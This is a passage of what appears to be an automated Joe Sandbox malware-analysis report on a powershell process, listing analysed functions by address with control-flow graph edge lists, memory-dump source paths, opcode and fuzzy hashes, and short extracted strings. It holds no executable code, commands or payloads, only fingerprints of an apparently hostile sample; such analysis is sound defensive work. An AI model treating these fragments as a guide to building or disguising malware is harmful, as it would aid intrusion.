                                                      • Opcode ID: 4396a0a071d5a8c08e5f7191d97d815a60e1d0f7e71aed44db27234faec3dba6
                                                      • Instruction ID: d9ba42c1ad3b0b56f35034472f66a837dc26b4bf041ea243a3e16413a0a8f6fe
                                                      • Opcode Fuzzy Hash: 4396a0a071d5a8c08e5f7191d97d815a60e1d0f7e71aed44db27234faec3dba6
                                                      • Instruction Fuzzy Hash: 9DC12671D00219DFDB24CFA9C884B9DBBF2BF88314F25822AE505A7350DB74A995CF91
                                                      Function 07661A18 Relevance: 5.6, Strings: 4, Instructions: 577COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7661a18-7661a3d 1 7661a43-7661a48 0->1 2 7661c30-7661c7a 0->2 3 7661a60-7661a64 1->3 4 7661a4a-7661a50 1->4 23 7661c80-7661c85 2->23 24 7661dfe-7661e42 2->24 8 7661be0-7661bea 3->8 9 7661a6a-7661a6c 3->9 6 7661a54-7661a5e 4->6 7 7661a52 4->7 6->3 7->3 10 7661bec-7661bf5 8->10 11 7661bf8-7661bfe 8->11 12 7661a6e-7661a7a 9->12 13 7661a7c 9->13 15 7661c04-7661c10 11->15 16 7661c00-7661c02 11->16 18 7661a7e-7661a80 12->18 13->18 19 7661c12-7661c2d 15->19 16->19 18->8 20 7661a86-7661aa5 18->20 36 7661aa7-7661ab3 20->36 37 7661ab5 20->37 27 7661c87-7661c8d 23->27 28 7661c9d-7661ca1 23->28 51 7661f58-7661f8d 24->51 52 7661e48-7661e4d 24->52 30 7661c91-7661c9b 27->30 31 7661c8f 27->31 33 7661ca7-7661ca9 28->33 34 7661db0-7661dba 28->34 30->28 31->28 38 7661cab-7661cb7 33->38 39 7661cb9 33->39 40 7661dc7-7661dcd 34->40 41 7661dbc-7661dc4 34->41 45 7661ab7-7661ab9 36->45 37->45 42 7661cbb-7661cbd 38->42 39->42 43 7661dd3-7661ddf 40->43 44 7661dcf-7661dd1 40->44 42->34 48 7661cc3-7661ce2 42->48 49 7661de1-7661dfb 43->49 44->49 45->8 50 7661abf-7661ac6 45->50 80 7661ce4-7661cf0 48->80 81 7661cf2 48->81 50->2 56 7661acc-7661ad1 50->56 82 7661f8f-7661fb1 51->82 83 7661fbb-7661fc5 51->83 53 7661e65-7661e69 52->53 54 7661e4f-7661e55 52->54 60 7661e6f-7661e71 53->60 61 7661f0a-7661f14 53->61 57 7661e57 54->57 58 7661e59-7661e63 54->58 64 7661ad3-7661ad9 56->64 65 7661ae9-7661af8 56->65 57->53 58->53 66 7661e73-7661e7f 60->66 67 7661e81 60->67 70 7661f16-7661f1e 61->70 71 7661f21-7661f27 61->71 68 7661add-7661ae7 64->68 69 7661adb 64->69 65->8 87 7661afe-7661b1c 65->87 74 7661e83-7661e85 66->74 67->74 68->65 69->65 77 7661f2d-7661f39 71->77 78 7661f29-7661f2b 71->78 74->61 84 7661e8b-7661e8d 74->84 86 7661f3b-7661f55 77->86 78->86 90 7661cf4-7661cf6 80->90 81->90 117 7662005-766202e 82->117 118 7661fb3-7661fb8 82->118 88 7661fc7-7661fcc 83->88 89 7661fcf-7661fd5 83->89 91 7661ea7-7661eae 84->91 92 7661e8f-7661e95 84->92 87->8 114 7661b22-7661b47 87->114 98 7661fd7-7661fd9 89->98 99 7661fdb-7661fe7 89->99 90->34 100 7661cfc-7661d33 90->100 96 7661ec6-7661f07 91->96 97 7661eb0-7661eb6 91->97 102 7661e97 92->102 103 7661e99-7661ea5 92->103 104 7661eba-7661ec4 97->104 105 7661eb8 97->105 106 7661fe9-7662002 98->106 99->106 124 7661d35-7661d3b 100->124 125 7661d4d-7661d54 100->125 102->91 103->91 104->96 105->96 114->8 134 7661b4d-7661b54 114->134 128 7662030-7662056 117->128 129 766205d-766208c 117->129 130 7661d3f-7661d4b 124->130 131 7661d3d 124->131 132 7661d56-7661d5c 125->132 133 7661d6c-7661dad 125->133 128->129 144 76620c5-76620cf 129->144 145 766208e-76620ab 129->145 130->125 131->125 135 7661d60-7661d6a 132->135 136 7661d5e 132->136 137 7661b56-7661b71 134->137 138 7661b9a-7661bcd 134->138 135->133 136->133 149 7661b73-7661b79 137->149 150 7661b8b-7661b8f 137->150 165 7661bd4-7661bdd 138->165 151 76620d1-76620d5 144->151 152 76620d8-76620de 144->152 161 7662115-766211a 145->161 162 76620ad-76620bf 145->162 157 7661b7d-7661b89 149->157 158 7661b7b 149->158 160 7661b96-7661b98 150->160 153 76620e4-76620f0 152->153 154 76620e0-76620e2 152->154 159 76620f2-7662112 153->159 154->159 157->150 158->150 160->165 161->162 162->144
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1420252700
                                                      • Opcode ID: ccc61cff6ecf43aa61e15eb0270e0d5aa9e018c9bba53722396040d7e19cd64c
                                                      • Instruction ID: da47f2d10abf332e0a1f336abf83ff9098d110af5ee71feaebba9b777d99da7c
                                                      • Opcode Fuzzy Hash: ccc61cff6ecf43aa61e15eb0270e0d5aa9e018c9bba53722396040d7e19cd64c
                                                      • Instruction Fuzzy Hash: 01124AB17043598FCB189B78981876BBBA5AFD3310F5480BADA06CF391DB32C945C7A1
                                                      Function 076619F8 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1070 76619f8-7661a3d 1073 7661a43-7661a48 1070->1073 1074 7661c30-7661c7a 1070->1074 1075 7661a60-7661a64 1073->1075 1076 7661a4a-7661a50 1073->1076 1095 7661c80-7661c85 1074->1095 1096 7661dfe-7661e42 1074->1096 1080 7661be0-7661bea 1075->1080 1081 7661a6a-7661a6c 1075->1081 1078 7661a54-7661a5e 1076->1078 1079 7661a52 1076->1079 1078->1075 1079->1075 1082 7661bec-7661bf5 1080->1082 1083 7661bf8-7661bfe 1080->1083 1084 7661a6e-7661a7a 1081->1084 1085 7661a7c 1081->1085 1087 7661c04-7661c10 1083->1087 1088 7661c00-7661c02 1083->1088 1090 7661a7e-7661a80 1084->1090 1085->1090 1091 7661c12-7661c2d 1087->1091 1088->1091 1090->1080 1092 7661a86-7661aa5 1090->1092 1108 7661aa7-7661ab3 1092->1108 1109 7661ab5 1092->1109 1099 7661c87-7661c8d 1095->1099 1100 7661c9d-7661ca1 1095->1100 1123 7661f58-7661f8d 1096->1123 1124 7661e48-7661e4d 1096->1124 1102 7661c91-7661c9b 1099->1102 1103 7661c8f 1099->1103 1105 7661ca7-7661ca9 1100->1105 1106 7661db0-7661dba 1100->1106 1102->1100 1103->1100 1110 7661cab-7661cb7 1105->1110 1111 7661cb9 1105->1111 1112 7661dc7-7661dcd 1106->1112 1113 7661dbc-7661dc4 1106->1113 1117 7661ab7-7661ab9 1108->1117 1109->1117 1114 7661cbb-7661cbd 1110->1114 1111->1114 1115 7661dd3-7661ddf 1112->1115 1116 7661dcf-7661dd1 1112->1116 1114->1106 1120 7661cc3-7661ce2 1114->1120 1121 7661de1-7661dfb 1115->1121 1116->1121 1117->1080 1122 7661abf-7661ac6 1117->1122 1152 7661ce4-7661cf0 1120->1152 1153 7661cf2 1120->1153 1122->1074 1128 7661acc-7661ad1 1122->1128 1154 7661f8f-7661fb1 1123->1154 1155 7661fbb-7661fc5 1123->1155 1125 7661e65-7661e69 1124->1125 1126 7661e4f-7661e55 1124->1126 1132 7661e6f-7661e71 1125->1132 1133 7661f0a-7661f14 1125->1133 1129 7661e57 1126->1129 1130 7661e59-7661e63 1126->1130 1136 7661ad3-7661ad9 1128->1136 1137 7661ae9-7661af8 1128->1137 1129->1125 1130->1125 1138 7661e73-7661e7f 1132->1138 1139 7661e81 1132->1139 1142 7661f16-7661f1e 1133->1142 1143 7661f21-7661f27 1133->1143 1140 7661add-7661ae7 1136->1140 1141 7661adb 1136->1141 1137->1080 1159 7661afe-7661b1c 1137->1159 1146 7661e83-7661e85 1138->1146 1139->1146 1140->1137 1141->1137 1149 7661f2d-7661f39 1143->1149 1150 7661f29-7661f2b 1143->1150 1146->1133 1156 7661e8b-7661e8d 1146->1156 1158 7661f3b-7661f55 1149->1158 1150->1158 1162 7661cf4-7661cf6 1152->1162 1153->1162 1189 7662005-766202e 1154->1189 1190 7661fb3-7661fb8 1154->1190 1160 7661fc7-7661fcc 1155->1160 1161 7661fcf-7661fd5 1155->1161 1163 7661ea7-7661eae 1156->1163 1164 7661e8f-7661e95 1156->1164 1159->1080 1186 7661b22-7661b47 1159->1186 1170 7661fd7-7661fd9 1161->1170 1171 7661fdb-7661fe7 1161->1171 1162->1106 1172 7661cfc-7661d33 1162->1172 1168 7661ec6-7661f07 1163->1168 1169 7661eb0-7661eb6 1163->1169 1174 7661e97 1164->1174 1175 7661e99-7661ea5 1164->1175 1176 7661eba-7661ec4 1169->1176 1177 7661eb8 1169->1177 1178 7661fe9-7662002 1170->1178 1171->1178 1196 7661d35-7661d3b 1172->1196 1197 7661d4d-7661d54 1172->1197 1174->1163 1175->1163 1176->1168 1177->1168 1186->1080 1206 7661b4d-7661b54 1186->1206 1200 7662030-7662056 1189->1200 1201 766205d-766208c 1189->1201 1202 7661d3f-7661d4b 1196->1202 1203 7661d3d 1196->1203 1204 7661d56-7661d5c 1197->1204 1205 7661d6c-7661dad 1197->1205 1200->1201 1216 76620c5-76620cf 1201->1216 1217 766208e-76620ab 1201->1217 1202->1197 1203->1197 1207 7661d60-7661d6a 1204->1207 1208 7661d5e 1204->1208 1209 7661b56-7661b71 1206->1209 1210 7661b9a-7661bcd 1206->1210 1207->1205 1208->1205 1221 7661b73-7661b79 1209->1221 1222 7661b8b-7661b8f 1209->1222 1237 7661bd4-7661bdd 1210->1237 1223 76620d1-76620d5 1216->1223 1224 76620d8-76620de 1216->1224 1233 7662115-766211a 1217->1233 1234 76620ad-76620bf 1217->1234 1229 7661b7d-7661b89 1221->1229 1230 7661b7b 1221->1230 1232 7661b96-7661b98 1222->1232 1225 76620e4-76620f0 1224->1225 1226 76620e0-76620e2 1224->1226 1231 76620f2-7662112 1225->1231 1226->1231 1229->1222 1230->1222 1232->1237 1233->1234 1234->1216
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15899c98005d43064dc98b916e22c0e05fec8bdb077acffa206dd14c2c5bfe51
                                                      • Instruction ID: de9031b704ea90d3f46ba8882ceac02b43da02f9622449dcc7974be9d723ba0e
                                                      • Opcode Fuzzy Hash: 15899c98005d43064dc98b916e22c0e05fec8bdb077acffa206dd14c2c5bfe51
                                                      • Instruction Fuzzy Hash: 8A412BF0A0430ADFCB188F74855576A7BB1AF83794B9480A6C902DF792EB31D945C7A1
                                                      Function 02E9D005 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1296 2e9d005-2e9d03d 1297 2e9d08d-2e9d095 1296->1297 1298 2e9d03f-2e9d04a 1296->1298 1297->1298 1299 2e9d04c-2e9d05a 1298->1299 1300 2e9d082-2e9d089 1298->1300 1302 2e9d060 1299->1302 1300->1299 1305 2e9d08b 1300->1305 1304 2e9d063-2e9d06b 1302->1304 1306 2e9d07b-2e9d080 1304->1306 1307 2e9d06d-2e9d075 1304->1307 1305->1304 1306->1307
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724486253.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_2e9d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28a5d485968d821e7b08f1a72842e01abe73bd6de7579d7dd611b16ede02266a
                                                      • Instruction ID: 398d34a76cd9a08beadb84e34f37561706fc44882397d8a12ade3de1e9039de4
                                                      • Opcode Fuzzy Hash: 28a5d485968d821e7b08f1a72842e01abe73bd6de7579d7dd611b16ede02266a
                                                      • Instruction Fuzzy Hash: 97012D7100E3C09FD7128B258C94762BFB4DF43228F19C1DBD9888F1A7C2699849C772
                                                      Function 02E9D01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1309 2e9d01d-2e9d03d 1310 2e9d08d-2e9d095 1309->1310 1311 2e9d03f-2e9d04a 1309->1311 1310->1311 1312 2e9d04c-2e9d05a 1311->1312 1313 2e9d082-2e9d089 1311->1313 1315 2e9d060 1312->1315 1313->1312 1318 2e9d08b 1313->1318 1317 2e9d063-2e9d06b 1315->1317 1319 2e9d07b-2e9d080 1317->1319 1320 2e9d06d-2e9d075 1317->1320 1318->1317 1319->1320
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724486253.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_2e9d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: febea24c6c37a86221bd05a685ad500136ae6265d8d93472e1c787d42e143642
                                                      • Instruction ID: ebf0dccaf8a5fde6fa6df8697e453c79a28f3c9ff3b8a0f4d48019a9fe90bc21
                                                      • Opcode Fuzzy Hash: febea24c6c37a86221bd05a685ad500136ae6265d8d93472e1c787d42e143642
                                                      • Instruction Fuzzy Hash: 1B0126310493109AEB10AF29CD84BA7FF98EF41328F18C52BED084B286C379D845C6B1

                                                      Non-executed Functions

                                                      Function 047A2697 Relevance: .1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ec0be41cd7e04d7e8f72906b7e823e8d8fd34dd3876582b0854207faa657dff
                                                      • Instruction ID: c06b29f36791f1859dadebaaa0513014dd477b6fcdf9b2ee51a9130196d6ff07
                                                      • Opcode Fuzzy Hash: 9ec0be41cd7e04d7e8f72906b7e823e8d8fd34dd3876582b0854207faa657dff
                                                      • Instruction Fuzzy Hash: 0A41D46294F7D02EC703AF385E320927F709F5311530A09DBD4C2CA6B7E499A91CC7A6
                                                      Function 047A205D Relevance: .1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb992aeb0f9cd01e02a14ac253f03492b8dcc054faba69aced609db6678e62d6
                                                      • Instruction ID: 599a237aad2d314e294c5eceee380d965250541373f0d981d17d6200ee52d090
                                                      • Opcode Fuzzy Hash: bb992aeb0f9cd01e02a14ac253f03492b8dcc054faba69aced609db6678e62d6
                                                      • Instruction Fuzzy Hash: FF31E6A290E3C54FD3539E2888652C27F71DF63144F0A82DBC4C1CB5A7E9295A1BC366
                                                      Function 047A0BD5 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a19ca78a1c9678a1ea223df4080b51647b33fb3bc4af5088371486fe66755bf
                                                      • Instruction ID: 95e1925a74c7292aa703dc3c0f43c1467ac37c58cd23b04a54586d76696236c2
                                                      • Opcode Fuzzy Hash: 9a19ca78a1c9678a1ea223df4080b51647b33fb3bc4af5088371486fe66755bf
                                                      • Instruction Fuzzy Hash: 3F21B96285EBE05FD707AB3899797957FA09F13608F0B41D7C0D48F0B7A798844CC6AA
                                                      Function 07663F50 Relevance: 10.3, Strings: 8, Instructions: 265COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (Xcq$(Xcq$4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                      • API String ID: 0-3664762724
                                                      • Opcode ID: 6f83f4b26c5bbe487a100a9ce5e7ee36795c6524efa5d0fced42ef6748a4e1fd
                                                      • Instruction ID: fda8b112ef2ac8ef168f99004692588f911fa19a19bf0e77caef8af7f80b17f3
                                                      • Opcode Fuzzy Hash: 6f83f4b26c5bbe487a100a9ce5e7ee36795c6524efa5d0fced42ef6748a4e1fd
                                                      • Instruction Fuzzy Hash: D38104F1B042968FCB159B7994182ABBFF69FD2210F24846BD406CB355DE32CA86C791
                                                      Function 07661078 Relevance: 9.2, Strings: 7, Instructions: 485COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                      • API String ID: 0-1608119003
                                                      • Opcode ID: ca3be5cda759623e4ccbca1a73a3fce4b94140ea61717b0e16ac09238ba7ac21
                                                      • Instruction ID: 32abd7a384fd4d938f1b8951800003e512999c47c29f93aadc3a33a0436da8a9
                                                      • Opcode Fuzzy Hash: ca3be5cda759623e4ccbca1a73a3fce4b94140ea61717b0e16ac09238ba7ac21
                                                      • Instruction Fuzzy Hash: C5F137B1B0421ACFCB189B78D41866ABBE6AFD6310F54807BD947CB351EB32C946C791
                                                      Function 076600F0 Relevance: 9.2, Strings: 7, Instructions: 460COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                      • API String ID: 0-1608119003
                                                      • Opcode ID: 9d0ea16b07a07c4ecb8a8a8b54238e944c8c0eecd5c3ec0c19d9ebaddb9fff29
                                                      • Instruction ID: 7426020a8ebd515e106dffba881c286aacc8576f3881bef20ae1f2fe82a478cc
                                                      • Opcode Fuzzy Hash: 9d0ea16b07a07c4ecb8a8a8b54238e944c8c0eecd5c3ec0c19d9ebaddb9fff29
                                                      • Instruction Fuzzy Hash: 1FE169B1B04346CFCB158B799418A6ABFE5AFC6210F5484BBD546CB392DA31CC4AC7A1
                                                      Function 07663028 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q$$^q$$^q
                                                      • API String ID: 0-2125118731
                                                      • Opcode ID: 23f0d74346e89bb287059454907428d0c3b1faada259280e14ac5824e5eb5c15
                                                      • Instruction ID: 0fe212f75445cd92a0e7a0d71fb2c3dbfeea3b075ac5f896887cba8afda30399
                                                      • Opcode Fuzzy Hash: 23f0d74346e89bb287059454907428d0c3b1faada259280e14ac5824e5eb5c15
                                                      • Instruction Fuzzy Hash: 9A2129B171430AABDB246A7B9C08B27AAD69BC1714FA4843AE507CB385DD36C8498361
                                                      Function 07663948 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                      • API String ID: 0-2049395529
                                                      • Opcode ID: 8d9a22f46c986746ce65dda67eb02b7b8d1bbd77a9e8f73d247e09e1f52f2ddf
                                                      • Instruction ID: 09ee830236a53d14dbf25c06cb4905cc0eb5b3134f97d29138b2f4ca667b2fa9
                                                      • Opcode Fuzzy Hash: 8d9a22f46c986746ce65dda67eb02b7b8d1bbd77a9e8f73d247e09e1f52f2ddf
                                                      • Instruction Fuzzy Hash: DA01F7A0B093954FC72B167A18281566F765FC361071945ABC082CF39BED658C8A87A3